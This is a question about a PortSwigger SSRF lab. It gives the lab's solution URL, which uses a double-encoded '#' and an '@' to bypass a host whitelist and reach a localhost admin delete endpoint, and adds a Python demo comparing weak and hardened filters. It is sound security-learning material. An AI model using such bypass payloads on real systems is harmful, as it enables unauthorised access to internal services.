The URL with the exercise is: https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter
The solution is:
http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos
A little simplified (no port specified):
http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos
We can concentrate simply on:
http://localhost%2523@stock.weliketoshop.net
Why is the credential component (everything before the @) processed as if everything after the @ is part of a URL fragment? Before double encoding the # character, the URL looks like this:
http://localhost#@stock.weliketoshop.net
Why is the @ even necessary, even after we double encode the #? Why does http://localhost%2523stock.weliketoshop.net (note: no '@') not work? Does the URL fragment statement take priority over the credential statement? Why is the @ ignored in favor of the #?
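Added example, not part of the question or the lab: Python's urllib.parse is used to show which host a filter sees at each decoding stage of the URL above, with and without the '@', and a stricter check beside the weak one. The whitelisted host value and both filter functions are constructed assumptions for the demo; the lab's own parsing code is not described in the question.

```python
from urllib.parse import urlsplit, unquote

# Assumption for this demo: the filter accepts exactly this host (constructed;
# the lab's real filter logic is not described in the question).
WHITELISTED_HOST = "stock.weliketoshop.net"

# Inputs: the URL from the question, and the variant without the '@' (constructed).
LAB_URL = "http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos"
NO_AT_URL = "http://localhost%2523stock.weliketoshop.net/admin/delete?username=carlos"


def host_seen_by(url: str) -> str:
    """Host that urlsplit extracts from the string exactly as given.

    The authority is everything between '//' and the first '/', '?' or '#';
    inside it, text before the last '@' is userinfo. So '#' only cuts the
    authority short once it is a literal character, not '%23' or '%2523'.
    """
    return urlsplit(url).hostname or ""


def host_after_decoding(url: str, rounds: int) -> str:
    """Percent-decode `rounds` times, then parse; models later stages that decode."""
    for _ in range(rounds):
        url = unquote(url)
    return host_seen_by(url)


def naive_whitelist_check(url: str) -> bool:
    """Weak filter: compares the host of the raw, still-encoded string only."""
    return host_seen_by(url) == WHITELISTED_HOST


def strict_whitelist_check(url: str) -> bool:
    """Hardened filter: no userinfo, no percent-encoding and no fragment in the
    authority, and the host must still match once the string is fully decoded."""
    parts = urlsplit(url)
    if "@" in parts.netloc or "%" in parts.netloc or parts.fragment:
        return False
    fully_decoded = url
    while unquote(fully_decoded) != fully_decoded:  # decode until stable
        fully_decoded = unquote(fully_decoded)
    return (host_seen_by(url) == WHITELISTED_HOST
            and host_seen_by(fully_decoded) == WHITELISTED_HOST)


if __name__ == "__main__":
    for label, url in (("with @", LAB_URL), ("without @", NO_AT_URL)):
        print(label, "| raw:", host_seen_by(url),
              "| 1 decode:", host_after_decoding(url, 1),
              "| 2 decodes:", host_after_decoding(url, 2))
```

With the '@' present the raw parse yields the whitelisted host, one decode still does, and only the second decode turns %23 into a literal '#' that ends the authority at localhost; without the '@' the raw host is never the whitelisted value, so the naive filter rejects it before any decoding happens.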